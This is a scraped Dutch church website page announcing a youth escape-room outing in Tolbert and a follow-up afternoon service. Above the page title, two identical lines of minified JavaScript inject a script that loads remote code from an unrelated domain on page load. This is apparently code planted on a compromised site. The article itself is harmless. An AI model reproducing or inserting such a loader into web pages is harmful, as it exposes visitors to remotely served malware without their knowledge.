;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Jongeren beleven zeer geslaagd mysterie activiteit! - PKN Damwâld

Jongeren beleven zeer geslaagd mysterie activiteit!

Gepubliceerd op: donderdag 26 januari 2017

Afgelopen zaterdag zijn de jongeren van onze kerk naar Tolbert geweest voor een mysterie activiteit. Hier waren een aantal Escape rooms waar de jongeren in kleine groepen in werden opgesloten. Door het kraken van codes, zoeken naar aanwijzingen moesten ze binnen een uur proberen te ontsnappen!

Iedereen ging enthousiast aan het zoeken, speuren en rekenen! Vele groepen wisten (soms ruim) binnen de tijd te ontsnappen! Na de tijd zijn er nog een aantal spelletjes gespeeld en stond er hapje en een drankje klaar!

Wij kijken terug op een zeer geslaagde avond! Maar dit is nog niet alles, 19 februari is er een middagdienst gewijd aan deze activiteit. Want kun je altijd ontsnappen? Is er hulp als je even niet uitkomt?

Tijdens de dienst worden (meer) foto’s en filmpjes(!) getoond van afgelopen zaterdag. Wil jij weten hoe jij er op staat, kom dan op 19 februari dan naar de Ikker, 14:00 starten we. Tot dan!

Uiteraard komen na de dienst ook alle foto’s in het foto album van de website zodat je ze altijd nog rustig kunt terug kijken 🙂

Foto's